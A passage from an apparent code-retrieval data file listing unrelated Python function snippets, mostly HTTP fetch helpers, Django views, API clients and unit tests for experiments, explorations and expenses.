pandas.DataFrame(df_list)\n df = df.iloc[1:]\n return df\n else:\n print('Status code returned a value of %s' % response.status_code)", "def test_fetch_no_results():\n url = (\n \"https://gliders.ioos.us/erddap/search/index.csv?page=1&itemsPerPage=100000&searchFor\"\n '=\"incredibly_long_string_that_should_never_match_a_real_dataset\" '\n )\n key = \"ioos\"\n data = fetch_results(url, key)\n assert data is None", "def get_public_explorations():\n return [exp_domain.Exploration(e) for e in\n exp_models.ExplorationModel.get_public_explorations()]", "def _fetch(self):\n self._data = self._get(self.url)\n\n if self._data['released_errata'] is not None:\n self._released_errata = Erratum(errata_id=self._data[\n 'released_errata']['id'])\n\n for errata_dict in self._data['all_errata']:\n errata = Erratum(errata_id=errata_dict['id'])\n self._all_errata.append(errata)\n\n self._signed_rpms = self._data.get('rpms_signed')\n\n for et_file in self._data['files']:\n self._files.append(et_file['path'])", "def fetch_object(url):\n print(' GET ' + url)\n session = requests.Session()\n retry = Retry(connect=3, backoff_factor=15)\n adapter = HTTPAdapter(max_retries=retry)\n session.mount('http://', adapter)\n session.mount('https://', adapter)\n r = session.get(url)\n # Covering internal server errors by retrying one more time\n if r.status_code == 500:\n time.sleep(5)\n r = requests.get(url, allow_redirects=True)\n elif r.status_code != 200:\n print(f\"Problem with request: {str(r)}\")\n raise RuntimeError(\"Non-200 status code\")\n return r", "def explores(self, explores):\n\n self._explores = explores", "def get(self, request):\n city_code = request.GET.get(\"city_code\", \"6624397033787067229\")\n checkin_date = request.GET.get(\"checkin_date\", \"20191026\")\n checkout_date = request.GET.get(\"checkout_date\", \"20191027\")\n url = \"https://hermes.goibibo.com/hotels/v9/search/data/v3/\" + city_code + \"/\" + checkin_date + \"/\" \\\n + checkout_date + \"/1-2-0\"\n\n params = {\n \"s\": \"popularity\",\n \"cur\": \"INR\",\n \"f\": \"{}\",\n \"sb\": \"0\",\n \"ud\": \"\",\n \"ai\": \"1\",\n \"asi\": \"0\",\n \"st\": \"voy\",\n \"vt\": \"city\",\n \"eid\": city_code,\n \"pid\": \"0\",\n \"im\": \"true\"\n }\n response = requests.get(url, params=params)\n resp = []\n if response.status_code == 200:\n response_data = response.json().get(\"data\", [])\n for obj in response_data:\n data_dict = {\n \"hotel_name\": obj.get(\"hn\", \"\"),\n \"star_rating\": obj.get(\"gr\", \"\"),\n \"image_url\": obj.get(\"t\", \"\"),\n \"price\": obj.get(\"opr\", \"\"),\n \"rating_count\": obj.get(\"grc\", \"\"),\n \"badge\": obj.get(\"bt\", \"\"),\n \"location\": obj.get(\"l\", \"\"),\n \"info\": obj.get(\"ut\", \"\")\n }\n resp.append(data_dict)\n return Response(resp)", "def fetch_from_url(request, url):\n\n err = None\n article = None\n path = None\n \n url_path = get_url_path(url)\n\n try:\n root = Article.get_root()\n except:\n err = not_found(request, '')\n return (article, path, err)\n\n if url_path and root.slug == url_path[0]:\n url_path = url_path[1:]\n\n path = Article.get_url_reverse(url_path, root)\n if not path:\n err = not_found(request, '/' + '/'.join(url_path))\n else:\n article = path[-1]\n return (article, path, err)", "def _get_one(self,url):\n pass", "def fetch_issue(repo, issue, issues_url, caching=CACHING_ACTIVE):\n if not caching:\n data = requests.get(issues_url + \"/{}\".format(issue)).json()\n if not response_check(data):\n return {}\n return data\n else:\n cached = get_cached_issue(repo, issue)\n if not cached:\n debug('cache miss issue', yellow)\n data = requests.get(issues_url + \"/{}\".format(issue)).json()\n if not response_check(data):\n return {}\n cache_issue(repo, issue, data)\n return data\n else:\n debug('Cache hit issue', green)\n return cached", "def get_exp(exp_file=None, exp_name=None):\n assert (\n exp_file is not None or exp_name is not None\n ), \"plz provide exp file or exp name.\"\n if exp_file is not None:\n return get_exp_by_file(exp_file)\n else:\n return get_exp_by_name(exp_name)", "def test_obtain_issues_exclude_false_positives(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=True, severity='High')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def fetch(prom_url, query_expr):\n\n global scrape_timestamp\n scrape_timestamp = int(datetime.now(tz=timezone.utc).timestamp() * 1000)\n\n response = requests.get(prom_url, params={ 'query': query_expr })\n results = response.json()['data']['result']\n\n return results", "def get(ctx, job):\n\n def get_experiment():\n try:\n response = PolyaxonClient().experiment.get_experiment(user, project_name, _experiment)\n cache.cache(config_manager=ExperimentManager, response=response)\n except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:\n Printer.print_error('Could not load experiment `{}` info.'.format(_experiment))\n Printer.print_error('Error message `{}`.'.format(e))\n sys.exit(1)\n\n get_experiment_details(response)\n\n def get_experiment_job():\n try:\n response = PolyaxonClient().experiment_job.get_job(user,\n project_name,\n _experiment,\n _job)\n cache.cache(config_manager=ExperimentJobManager, response=response)\n except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:\n Printer.print_error('Could not get job `{}`.'.format(_job))\n Printer.print_error('Error message `{}`.'.format(e))\n sys.exit(1)\n\n if response.resources:\n get_resources(response.resources.to_dict(), header=\"Job resources:\")\n\n response = Printer.add_status_color(response.to_light_dict(\n humanize_values=True,\n exclude_attrs=['uuid', 'definition', 'experiment', 'unique_name', 'resources']\n ))\n Printer.print_header(\"Job info:\")\n dict_tabulate(response)\n\n user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),\n ctx.obj.get('experiment'))\n\n if job:\n _job = get_experiment_job_or_local(job)\n get_experiment_job()\n else:\n get_experiment()", "def view_experiment(request,id):\n\texp = Experiment.objects.get(id=id)\n\tpossibly_related = get_related(exp)\n\treturn list_detail.object_detail(request,\n\t\t\t\t\t\t\t\t\tqueryset=Experiment.objects.filter(id=id),\n\t\t\t\t\t\t\t\t\tobject_id=exp.id,\n\t\t\t\t\t\t\t\t\ttemplate_name='experiments/experiment.html',\n\t\t\t\t\t\t\t\t\textra_context= {\"possibly_related\" : possibly_related})", "def test_get_models_throws_if_project_does_not_exist(\n fc: fetcher.Fetcher, project, model\n):\n with pytest.raises(exceptions.NotFoundError) as exc:\n fc.get_models(project=project, model=model)\n assert \"An error occured while getting projects.\" in str(exc.value)", "def sel_exp_query(\n experiment_name,\n model,\n # db_config,\n credentials,\n cluster=False):\n perfs = None\n proc_model_name = '%%/%s' % model\n with allen_db(\n # config=db_config,\n cluster=cluster,\n credentials=credentials) as db_conn:\n perfs = db_conn.get_performance_by_model(\n experiment_name=experiment_name,\n model=proc_model_name)\n return perfs", "def found_entities(token, path='', resource='TOTAL', file='result.csv', save=False, chunk_size=128):\n\n headers = {\n 'accept': 'text/csv',\n }\n\n try:\n response = requests.get(\n 'https://reactome.org/AnalysisService/download/%s/entities/found/%s/%s' % (token, resource, file),\n headers=headers)\n except ConnectionError as e:\n print(e)\n\n if response.status_code == 200:\n if save:\n with open(\"\".join([path, file]), 'wb') as f:\n for chunk in response.iter_content(chunk_size=chunk_size):\n f.write(chunk)\n else:\n gene_list = response.text.split('\\n')\n df_list = [row.split(\",\") for row in gene_list[:-1]]\n df = pandas.DataFrame(df_list)\n df = df.iloc[1:]\n return df\n else:\n print('Status code returned a value of %s' % response.status_code)", "def test_GET_fetcher_fail():\n bad_url = GET_ECHO_ENDPOINT.replace('.com', '.comx')\n\n with pytest.raises(Exception): #TODO: specific exception?\n resp = wf_utils.fetch_GET_request(bad_url)\n\n #TODO: bad status code tests?", "def assert_fetch_raises(self, view_name, args=None, kwargs=None):\n with self.assertRaises(ImproperlyConfigured):\n response_from_view(view_name, args=args, kwargs=kwargs)", "def test_codigo_exp(self):\n response = self.client.get('/apirest/expedientes/?codigoExp=0019-JGM-2014')\n self.assertEqual(response.status_code, self.CODIGO_EXITO)\n self.assertEqual(response.data[\"count\"], 1)\n self.assertEqual(response.data[\"results\"][0][\"tipocamara\"], self.TIPO_CAMARA)\n self.assertEqual(response.data[\"results\"][0][\"voces\"], self.RANGO_FECHAS_VOCES)", "def getexperimentinfo(expid):\n rdata = {}\n rdata['expId'] = expid\n res = requests.get(scbd_server_address + '/experiments/get_details', json=rdata)\n if res.status_code == 200:\n outstr = ''\n for cres in res.json()['details']:\n outstr += cres[0] + ':' + cres[1] + '<br>'\n # details=res.json()['details']\n return outstr\n return []", "def get_all_images(access_token):\n url = 'http://interview.agileengine.com/images'\n headers = {\n 'Authorization': 'Bearer ' + access_token\n }\n images = []\n try:\n logging.info(\"Fetching all the images\")\n response = requests.get(\n url,\n headers=headers\n )\n if response.ok: \n total_pages = response.json().get('pageCount')\n images = response.json().get('pictures')\n logging.info(f\"fetched 1 of {total_pages}\")\n for i in range(2,total_pages + 1):\n paginated_url = f'http://interview.agileengine.com/images?page={i}'\n response = requests.get(\n paginated_url,\n headers=headers\n )\n images += response.json().get('pictures')\n logging.info(f\"fetched {i} of {total_pages}\")\n \n detailed_images = []\n for image in images:\n detail_url = f\"http://interview.agileengine.com/images/{image.get('id')}\"\n \n logging.info(f\"Retrieving detail of {image['id']}\")\n response = requests.get(\n detail_url,\n headers=headers\n )\n if response.ok:\n detailed_images.append(response.json())\n return detailed_images\n except requests.exceptions.HTTPError:\n logging.exception('HTTP error')\n except requests.exceptions.ConnectionError:\n logging.exception('Connection error')\n except requests.exceptions.Timeout:\n logging.exception('Timeout error')\n except requests.exceptions.RequestException as e:\n logging.exception('Unexpected error')", "def test_get_issues_no_hydrator():\n app = CometApi().create_app()\n with app.app_context():\n client = app.test_client()\n assert client.get(\"/v0/issues\")", "def test_impact_for_exp_with_no_ratings(self):\n # Sign up a user and have them create an exploration.\n user_a_id = self._sign_up_user(\n self.USER_A_EMAIL, self.USER_A_USERNAME)\n self._create_exploration(self.EXP_ID_1, user_a_id)\n user_stats_model = user_models.UserStatsModel.get(\n user_a_id, strict=False)\n self.assertEqual(user_stats_model, None)", "def _try_extractors(environ, extractors, start_response):\n for extractor_name in extractors:\n try:\n imported_module = __import__('tiddlyweb.web.extractors.%s' %\n extractor_name, {}, {}, ['Extractor'])\n except ImportError:\n try:\n imported_module = __import__(extractor_name, {}, {},\n ['Extractor'])\n except ImportError, exc:\n raise ImportError('could not load extractor %s: %s' %\n (extractor_name, exc))\n extractor = imported_module.Extractor()\n extracted_user = extractor.extract(environ, start_response)\n if extracted_user:\n logging.debug('UserExtract:%s found %s',\n extractor_name, extracted_user)\n return extracted_user\n return False", "def get_experiment_parser(opts):\n\n user, passwd = auth.get_user_credentials(opts.username, opts.password)\n api = rest.Api(user, passwd)\n\n if opts.get_cmd == 'experiment_list':\n return experiment.get_experiments_list(api, opts.state, opts.limit,\n opts.offset)\n else:\n exp_id = helpers.get_current_experiment(api, opts.experiment_id)\n return experiment.get_experiment(api, exp_id, opts.get_cmd)", "def exploits(self):\n return self.rpc.call(MsfRpcMethod.ModuleExploits)['modules']", "def test_get_object_not_found(self, employee_model):\n employee_model.DoesNotExist = Employee.DoesNotExist\n employee_model.objects.get.side_effect = employee_model.DoesNotExist\n\n with self.assertRaises(Http404):\n self.view.get_object(1)", "def explore_view(request):\r\n # explore items\r\n user = request.user.userprofile\r\n items = Item.objects.explore(user)\r\n context = {'items':items}\r\n return render(request, 'explore/explore.html', context)", "def list(self, request):\n exp = Experiment.objects.all()\n serializer = ExperimentSerializer(exp, many=True)\n return send_response(request.method, serializer)", "def __getitem__(self, type: str):\n nodes = pandas.read_csv(join(self.base_path, \"nodes.csv\"))\n edges = pandas.read_csv(join(self.base_path, \"held.csv\"))\n if type == \"link\":\n # nodes = pandas.read_csv(join(self.base_path, \"nodes.csv\"))\n held = pandas.read_csv(join(self.base_path, \"held.csv\"))\n\n held = held.query('type == 8')[['src', 'dst']]\n\n # node_pool = set(self.splits[2])\n # held = keep_from_set(held, node_pool)\n\n return Experiment(self.embed, nodes, edges, held, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"apicall\":\n api_seq = pandas.read_csv(self.experiments['apicall'])\n\n # unique_nodes = set(nodes['id'].values.tolist())\n\n # api_seq_test = api_seq.copy()\n # api_seq_test['src'] = api_seq_test['src'].apply(lambda nid: nid if nid in unique_nodes else None)\n # api_seq_test['dst'] = api_seq_test['dst'].apply(lambda nid: nid if nid in unique_nodes else None)\n # api_seq_test.dropna(axis=0, inplace=True)\n\n # disabled for testing\n # api_seq = api_seq[\n # api_seq['src'].apply(lambda nid: nid in unique_nodes)\n # ]\n #\n # api_seq = api_seq[\n # api_seq['dst'].apply(lambda nid: nid in unique_nodes)\n # ]\n\n node_pool = set(self.splits[2])\n api_seq = keep_from_set(api_seq, node_pool)\n\n return Experiment(self.embed, nodes, edges, api_seq, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"typeuse\":\n held = pandas.read_csv(join(self.base_path, \"held.csv\"))\n\n held = held.query('type == 2')[['src', 'dst']]\n\n # node_pool = set(self.splits[2])\n # held = keep_from_set(held, node_pool)\n\n return Experiment(self.embed, nodes, edges, held, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\", compact_dst=False)\n\n elif type == \"varuse\":\n var_use = pandas.read_csv(self.experiments['varuse'])\n\n # unique_nodes = set(nodes['id'].values.tolist())\n node_pool = set(self.splits[2])\n\n var_use = var_use[\n var_use['src'].apply(lambda nid: nid in node_pool)\n ]\n\n return Experiment2(self.embed, nodes, edges, var_use, split_on=\"nodes\", neg_sampling_strategy=\"word2vec\")\n\n elif type == \"fname\":\n\n # fname = pandas.read_csv(self.experiments['fname'])\n functions = nodes.query('label == 4096')\n functions['fname'] = functions['name'].apply(lambda name: name.split(\".\")[-1])\n\n functions['src'] = functions['id']\n functions['dst'] = functions['fname']\n\n # unique_nodes = set(nodes['id'].values.tolist())\n node_pool = set(self.splits[2])\n\n functions = functions[\n functions['src'].apply(lambda nid: nid in node_pool)\n ]\n\n # use edge splits when outgoing degree is 1\n\n return Experiment2(self.embed, nodes, edges, functions[['src', 'dst']], split_on=\"edges\", neg_sampling_strategy=\"word2vec\")\n\n elif type == \"nodetype\":\n\n types = nodes.copy()\n types['src'] = nodes['id']\n types['dst'] = nodes['label']\n\n print(\"WARNING: Make sure that you target label is stored in the field: label\")\n # raise Warning(\"Make sure that you target label is stored in the field: label\")\n\n node_pool = set(self.splits[2])\n\n types['src'] = types['src'].apply(lambda nid: nid if nid in node_pool else None)\n types = types.dropna(axis=0)\n\n return Experiment3(self.embed, nodes, edges, types[['src', 'dst']], split_on=\"edges\", neg_sampling_strategy=\"word2vec\")\n else:\n raise ValueError(f\"Unknown experiment: {type}. The following experiments are available: [apicall|link|typeuse|varuse|fname|nodetype].\")", "def test_get_explore_join_stats(fc: fetcher.Fetcher, test_model):\n explore = fc.get_explores(\n model=test_model[\"name\"], explore=\"explore_2_joins_1_used\"\n )[0]\n field_stats = {\n \"explore_2_joins_1_used.d1\": 10,\n \"explore_2_joins_1_used.d2\": 5,\n \"explore_2_joins_1_used.d3\": 0,\n \"explore_2_joins_1_used.m1\": 0,\n \"join1.d1\": 10,\n \"join1.d2\": 10,\n \"join1.d3\": 10,\n \"join1.m1\": 0,\n \"join2.d1\": 0,\n \"join2.d2\": 0,\n \"join2.d3\": 0,\n \"join2.m1\": 0,\n }\n join_stats = fc.get_explore_join_stats(explore=explore, field_stats=field_stats)\n assert isinstance(join_stats, dict)\n assert len(join_stats) == 2\n assert join_stats == {\"join1\": 30, \"join2\": 0}", "def test_request_fetch_bogus_url():\n with pytest.raises(SystemExit):\n request.fetch(\"lsdfjlsdjf\")", "def find_experiments(model, version, page_index=0):\n\n # We use filter queries instead of regular boolean queries.\n # This is done so that the sort order isn't influenced.\n # We may need to add additional sorting to make a sensible resultset.\n search_query = {\n 'query': {\n 'bool': {\n 'filter': [\n {'term': {'model': model}},\n {'term': {'version': version}}\n ]\n }\n }\n }\n\n results = find_items('experiment', search_query, page_index)\n\n records = []\n total_items = results['hits']['total']\n\n # Elastic search always returns results, even when you request a non-existing page.\n # To prevent weird behavior in our api, we check for this and return empty results\n # when you requested an empty page.\n if total_items < page_index * PAGE_SIZE:\n return PagedResultSet(page_index, PAGE_SIZE, total_items, [])\n\n for item in results['hits']['hits']:\n records.append({\n 'model': item['_source']['model'],\n 'version': item['_source']['version'],\n 'name': item['_source']['experiment'],\n 'date_created': item['_source']['date_created']\n })\n\n return PagedResultSet(page_index, PAGE_SIZE, total_items, records)", "def geolife(redownload: bool = False) -> Dataset:\n return Dataset.get(\"geolife\", redownload=redownload)", "def get_links(proj,exp):\n response = do_method(\"experiment.info\",\n {\"proj\":proj,\"exp\":exp,\"aspect\":\"links\"})\n check_response(response)\n return response['value']", "def test_obtain_issues_exclude_wrong_severity(self, mock_url_read):\n mock_url_read.side_effect = [LAST_SCAN, '{\"reportId\": 22}', '{\"status\": {\"value\": \"Created\"}}',\n SAST_REPORT.format(false_positive=False, severity='Low')]\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)", "def problem1() -> Dict[str, List[req.Response]]:\n keywords = collect_keywords(KEYWORDS)\n if len(keywords) == 0:\n raise Exception(\"[ERROR] No keywords were found in the keyword file!\")\n web_scraper = WebScraper(keywords) \n web_pages = web_scraper.crawl()\n return web_pages", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def do_fetch(self):\n pass", "def __init__(self, requested_experiments, experiment_meta_model):\n # Ensure that ExperimentMetaInfo is the type of all experiments.\n if not False in [isinstance(exp, experiment_meta_model) for exp in requested_experiments]: \n self.req_exps = requested_experiments \n else:\n self.req_exps = [experiment_meta_model.objects.get(pk=exp.pk) \n for exp in requested_experiments]\n \n self.app_label = experiment_meta_model._meta.app_label\n for exp in self.req_exps:\n if exp.measurementmodel is None:\n raise NoRelatedMeasurementModel(exp)", "def get_by_id(self, expense_id):\n return self._get_request({}, Expenses.GET_EXPENSE_BY_ID.format(expense_id))", "def test_get_pricehistory_non_existing_product(self):\n res = self.get(url=\"/products/10/pricehistory\", role=\"admin\")\n self.assertException(res, exc.EntryNotFound)", "def viewexperiments(request):\r\n # Obtain the context from the HTTP request.\r\n\r\n context_instance = RequestContext(request)\r\n\r\n try:\r\n user = _validate_and_get_geniuser(request)\r\n except LoggedInButFailedGetGeniUserError:\r\n return _show_failed_get_geniuser_page(request)\r\n\r\n\r\n page_top_errors = []\r\n username = user.username\r\n ret = [] #returning list\r\n user_experiments = Experiment.objects.filter(geni_user=user)\r\n for experiment in reversed(user_experiments):\r\n #reversed so the oldest experiment is the last we show.\r\n experiment_sensors = []\r\n name_list = []\r\n experiment_sensors.extend(list(Battery.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Bluetooth.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Cellular.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Settings.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(ConcretSensor.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Location.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Signal_strengths.objects.filter(experiment_id=experiment)))\r\n experiment_sensors.extend(list(Wifi.objects.filter(experiment_id=experiment)))\r\n\r\n for sensor in experiment_sensors:\r\n name_list.append(sensor.show_name())\r\n\r\n if name_list == []:\r\n name_list = \"None\"\r\n\r\n ret.append([experiment.expe_name,name_list,experiment.id])\r\n \r\n \r\n \r\n return render(request, 'control/viewexperiments.html', {'username' : username, \r\n 'page_top_errors' : page_top_errors, 'ret':ret})", "def test_obtain_issues_response_error(self, mock_error, mock_url_read):\n mock_url_read.return_value = 'non-json'\n self.__report.obtain_issues(['id'], 'high')\n issues = self.__report.issues()\n self.assertIsInstance(issues, List)\n self.assertEqual(len(issues), 0)\n self.assertEqual(mock_error.call_args[0][0], \"Error loading json: %s.\")\n self.assertIsInstance(mock_error.call_args[0][1], ValueError)", "def load_demo(exploration_id):\n if not (0 <= int(exploration_id) < len(feconf.DEMO_EXPLORATIONS)):\n raise Exception('Invalid demo exploration id %s' % exploration_id)\n\n exploration = feconf.DEMO_EXPLORATIONS[int(exploration_id)]\n\n if len(exploration) == 3:\n (exp_filename, title, category) = exploration\n image_filename = None\n elif len(exploration) == 4:\n (exp_filename, title, category, image_filename) = exploration\n else:\n raise Exception('Invalid demo exploration: %s' % exploration)\n\n image_id = None\n if image_filename:\n image_filepath = os.path.join(\n feconf.SAMPLE_IMAGES_DIR, image_filename)\n image_id = image_models.Image.create(utils.get_file_contents(\n image_filepath, raw_bytes=True))\n\n yaml_content = utils.get_sample_exploration_yaml(exp_filename)\n exploration_id = create_from_yaml(\n yaml_content, ADMIN_COMMITTER_ID, title, category,\n exploration_id=exploration_id, image_id=image_id)\n\n exploration = get_exploration_by_id(exploration_id)\n exploration.is_public = True\n save_exploration(ADMIN_COMMITTER_ID, exploration)\n\n logging.info('Exploration with id %s was loaded.' % exploration_id)", "def test_get_rate_article_not_found(self):\n self.client.credentials(HTTP_AUTHORIZATION='Bearer ' + self.token)\n response = self.client.get(\n self.view_rates_url + str(2) + \"/\",\n format='json')\n self.assertEqual(\n 0,\n response.data[\"rates\"])\n self.assertEqual(204, status.HTTP_204_NO_CONTENT)", "def _create_explore_query(self, explore: Explore, model_name: str) -> Query:\n dimensions = [dimension.name for dimension in explore.dimensions]\n query = self.client.create_query(model_name, explore.name, dimensions)\n return Query(query[\"id\"], lookml_ref=explore, explore_url=query[\"share_url\"])", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def read_next():\n try:\n response = requests.get(APIURL + '/articles/?format=json&random=yes')\n parser = json.loads(response.content)\n return parser\n except:\n raise Http404(\"Article does not exist\")", "def get_list(self, resp):\n expenses = resp['expenses']\n expense_list = ExpenseList()\n for value in expenses:\n expense = Expense()\n expense.set_expense_id(value['expense_id'])\n expense.set_date(value['date'])\n expense.set_account_name(value['account_name'])\n expense.set_paid_through_account_name(value[\\\n 'paid_through_account_name'])\n expense.set_description(value['description'])\n expense.set_currency_id(value['currency_id'])\n expense.set_currency_code(value['currency_code'])\n expense.set_bcy_total(value['bcy_total'])\n expense.set_total(value['total'])\n expense.set_is_billable(value['is_billable'])\n expense.set_reference_number(value['reference_number'])\n expense.set_customer_id(value['customer_id'])\n expense.set_customer_name(value['customer_name'])\n expense.set_vendor_id(value['vendor_id'])\n expense.set_vendor_name(value['vendor_name'])\n expense.set_status(value['status'])\n expense.set_created_time(value['created_time'])\n expense.set_expense_receipt_name(value['expense_receipt_name'])\n expense_list.set_expenses(expense)\n page_context_obj = PageContext()\n page_context = resp['page_context']\n page_context_obj.set_page(page_context['page'])\n page_context_obj.set_per_page(page_context['per_page'])\n page_context_obj.set_has_more_page(page_context['has_more_page'])\n page_context_obj.set_report_name(page_context['report_name'])\n page_context_obj.set_applied_filter(page_context['applied_filter'])\n page_context_obj.set_sort_column(page_context['sort_column'])\n page_context_obj.set_sort_order(page_context['sort_order'])\n expense_list.set_page_context(page_context)\n\n return expense_list", "def get_images_by_vulnerability(self, **kwargs):\n ...", "def test_api_can_get_all_expenses(self):\n self.register_user()\n result = self.login_user()\n access_token = json.loads(result.data.decode())['access_token']\n res = self.client().post('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token), data=self.expense)\n self.assertEqual(res.status_code, 201)\n res = self.client().get('/expenses/', headers=dict(Authorization=\"Bearer \" + access_token))\n self.assertEqual(res.status_code, 200)\n results = json.loads(res.data)\n self.assertEqual(results['items'][0]['name'], self.expense['name'])", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def test_get_list_most_expensive(self):\n\n expensive_goods_test = self.info_list.get_list_most_expensive()\n most_expensive_test = self.form_expensive_list_goods()\n\n self.assertEqual(expensive_goods_test, most_expensive_test)", "def explore(self, episode_count):\n # single agent, always use the `run_one_episode` api.\n # multi agent with `standalone` api_type, use the `run_one_episode` api.\n if self.env_info[\"api_type\"] == \"standalone\":\n # (use_explore, collect)\n _paras = [\n (True, False if _ag.alg.async_flag else True) for _ag in self.agents\n ]\n job_funcs = [agent.run_one_episode for agent in self.agents]\n for _epi_index in range(episode_count):\n _start2 = time()\n self.env.reset()\n for agent in self.agents:\n agent.reset()\n\n trajectory_list = self.bot.do_multi_job(job_funcs, _paras)\n for agent, trajectory in zip(self.agents, trajectory_list):\n if not agent.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n\n if _epi_index == episode_count - 1:\n self.ag_stats.update_with_agent_stats(\n [agent.get_perf_stats() for agent in self.agents]\n )\n\n elif self.env_info[\"api_type\"] == \"unified\":\n for _ in range(episode_count):\n _start2 = time()\n trajectories = self._run_one_unified_episode(\n use_explore=True, collect=True)\n\n for _ag, trajectory in zip(self.agents, trajectories):\n if not _ag.alg.async_flag:\n # self.trajectories.append(trajectory)\n self.send_explorer.send(trajectory)\n\n self._post_processes()\n self.ag_stats.explore_time_in_epi = time() - _start2\n else:\n pass\n\n self.clear_trajectories()\n return self.ag_stats.get()", "def test_fetch_malform_url(self):\n url = 'http://githubcom'\n with self.assertRaises(InvalidGitHubUrl):\n GitHubRepoFetcher().fetch(url)", "def fetch(self,url=URL):\n\t\tlog.info('downloading latest PHE case data')\n#\t\tself.data=lookup_json(url)\n\t\tself.fetch_csv() #JSON discontinued; switched back to CSV\n\t\tself.edition=self.latest_samples\n\t\tlog.info(f'Last samples from {self.edition}')", "def retrieve_data(self, url: str) -> Tuple[Optional[List[dict]], Optional[httpx.Response]]:\n timeout = 30\n timeout_count = 0\n num_attempts = 1\n while num_attempts <= 10:\n\n response = hit_api(self.key_manager, url, self.logger, timeout)\n\n if response is None:\n if timeout_count == 10:\n self.logger.error(f\"Request timed out 10 times for {url}\")\n return None, None, GithubApiResult.TIMEOUT\n\n timeout = timeout * 1.1\n num_attempts += 1\n continue\n\n # if api returns a status of 204 No Content then return empty list\n if response.status_code == 204:\n return [], response, GithubApiResult.SUCCESS\n \n \n page_data = parse_json_response(self.logger, response)\n\n\n # if the data is a list, then return it and the response\n if isinstance(page_data, list) is True:\n return page_data, response, GithubApiResult.SUCCESS\n\n # if the data is a dict then call process_dict_response, and \n if isinstance(page_data, dict) is True:\n dict_processing_result = process_dict_response(self.logger, response, page_data)\n\n if dict_processing_result == GithubApiResult.NEW_RESULT:\n self.logger.info(f\"Encountered new dict response from api on url: {url}. Response: {page_data}\")\n return None, None, GithubApiResult.NEW_RESULT\n\n if dict_processing_result == GithubApiResult.REPO_NOT_FOUND:\n return None, response, GithubApiResult.REPO_NOT_FOUND\n\n if dict_processing_result in (GithubApiResult.SECONDARY_RATE_LIMIT, GithubApiResult.ABUSE_MECHANISM_TRIGGERED):\n continue\n\n if dict_processing_result == GithubApiResult.RATE_LIMIT_EXCEEDED:\n num_attempts = 0\n continue \n\n if isinstance(page_data, str) is True:\n str_processing_result: Union[str, List[dict]] = self.process_str_response(page_data)\n\n if isinstance(str_processing_result, list):\n return str_processing_result, response, GithubApiResult.SUCCESS\n\n num_attempts += 1\n\n self.logger.error(\"Unable to collect data in 10 attempts\")\n return None, None, GithubApiResult.NO_MORE_ATTEMPTS", "def get_exposure(exposure_id,b_mean,b_sd,c_mean,c_sd,non_rate,dist_type,mortalities):#id in db\n\te_id \t\t= int(long(exposure_id))\n\texposure_outcomes = DBHelper.exposure_outcome\n\toutcome_ids \t= DBHelper.exposure_outcome.get(e_id)\n\n\tsamples_rr \t= DBHelper.samples_rr.get(e_id)\n\tsamples_pop \t= DBHelper.samples_pop.get(e_id)\n\trisks \t\t= DBHelper.risks.get(e_id)\n\tmeasure \t= DBHelper.measures.get(e_id)\n\tdist_type \t= get_dist_type(e_id)\n\n\t#get population distribution \n\tpopDistribution = PopDistribution(DBHelper.age_group_num,non_rate,b_mean,b_sd,c_mean,c_sd,samples_pop,dist_type)\n\n\t#get outcomes\n\toutcomes = []\n\tfor o_id in outcome_ids:\n\t\t# mortality\n\t\tm_mortality = mortalities.get(2*o_id)\n\t\tf_mortality = mortalities.get(2*o_id+1)\n\t\t# risks\n\t\tm_risks = risks.get(2*o_id)\n\t\tf_risks = risks.get(2*o_id+1)\n\t\t# outcome name\n\t\tname = DBHelper.get_outcome_name(o_id)\n\t\t# limit estimates\n\t\tlle = DBHelper.exposure_outcome.get(e_id).get(o_id)[0]\n\t\tule = DBHelper.exposure_outcome.get(e_id).get(o_id)[1]\n\t\t# outcome\n\t\toutcome = PrimeOutcome(name,o_id,m_mortality,f_mortality,samples_rr,m_risks,f_risks,lle,ule,measure,e_id) \n\t\toutcomes.append(outcome)\n\n\texposure = PrimeExposure(mortalities,outcome_ids,samples_rr,samples_pop,outcomes,popDistribution)\n\treturn exposure", "def test_api_predictors_get(self):\n pass", "def __getitem__(self, url):\n try:\n record = self.es.get(index=self.index, doc_type=self.doc_type, id=url)['_source']['result']\n return record\n except elasticsearch.NotFoundError as e:\n raise KeyError(url + ' does not exist')", "def experiences(self):\n return self.client.call('GET',\n self.name + 'experiences')", "def get(self) -> list:\n return self.__expedition", "def load(extended=False):\n\n _fetch_large()\n if extended:\n return _load(cache_experiment_extended, _parse_experiment)\n else:\n return _load(cache_experiment, _parse_experiment)", "def GetModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def fetch_maybe(cls, url, path, save=False):\n if os.path.isfile(path):\n # print(\"Found %s\" % 